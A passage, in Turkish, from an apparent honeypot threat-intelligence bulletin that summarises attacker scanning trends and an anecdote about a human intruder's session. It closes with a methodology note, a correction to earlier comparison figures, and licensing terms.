İkinci katman daha sessiz: taranan yüzeyler değişiyor. Telegram oturumu arayan bir küme, kendini yayan bir PHP zinciri, 2026’da yayımlanmış zafiyetler ve ilk kez bir MCP el sıkışması. Saldırgan tarafı yeni teknolojiyi bizim kadar hızlı öğreniyor.

Ve bu dönemin armağanı yine tek bir oturum. Otomasyonun 74 milyon olay ürettiği bir pencerede, bir insan Windows makinesinden bağlandı, boş parolayla girdi, işlemciyi ve diski tarttı, paket yöneticisiyle boğuştu, kabuğu tarayıcı sanıp adres yazdı ve kırk dakika sonra vazgeçti. Kimliğini de en insani biçimde bıraktı: klavye düzenini değiştirmeyi unutarak.


Metodoloji ve Lisans

Bu rapor 9 Ağustos 13:00 – 13 Ağustos 05:20 UTC arası ham honeypot loglarının ve IoC veritabanı kayıtlarının OPSEC-filtreli analiziyle hazırlandı. Pencerenin tamamı hem sensör retention’ı hem veritabanı içinde kaldığı için tek katmanlıdır. Ham hacim rakamları pasif parmak izi modülü P0f’i içerir (toplamın %75,8’i). Dahili IP’ler, yönetim trafiği, RFC1918/CGNAT ve bilinen operasyonel kaynaklar public yayından çıkarılmıştır; çıkarma filtresi bilinen-pozitif üzerinde sınanmıştır. Saldırgan payload’larında ve operatörün yazdığı bir adres sorgusunda geçen sensör adresleri maskelenmiştir. 13 Ağustos kısmi gündür.

Önceki bültenle kıyas hakkında bir düzeltme. Bu bültendeki karşılaştırma değerleri, önceki bültende yayımlanan sayılar değil yeniden ölçülmüş taban değerlerdir. İki sebep var. Birincisi, 2-5 Ağustos aralığı sensör retention’ından düşmüş durumda ve geriye dönük ölçülemiyor; kıyas bu yüzden 6-9 Ağustos üzerinden kuruldu. İkincisi, önceki bültenin ASN rakamları bugünkü ölçümle yeniden üretilemedi: ASN’ler arası oranlar birebir aynı çıkıyor ama mutlak değerler farklı, dolayısıyla o tablo kısmi bir gün verisiyle alınmış görünüyor. Port ve imza rakamları ise %0,5 içinde doğrulandı. Sayı uydurmak yerine tabanı yeniden ölçmeyi tercih ettik; oran karşılaştırmaları bu yüzden geçerli, mutlak değer karşılaştırmaları yalnız bu bültenin kendi ölçümleri arasında yapılmalıdır.

Bu bültenlerin dayandığı honeypot ağının ne olduğunu ve nasıl çalıştığını merak ediyorsanız: Honeypot (Bal Küpü) Nedir? Türleri, Kurulumu ve Sahadan Gerçek Veriler. MySQL envanter taramasının başladığı pencere: 9 Ağustos bülteni.

Lisans: CC BY 4.0 · Atıf yapılarak serbestçe kullanılabilir. IOC’lar CC0 lisansı altında serbesttir. SiberKale Tellal · Threat Intelligence Feed · tellal.net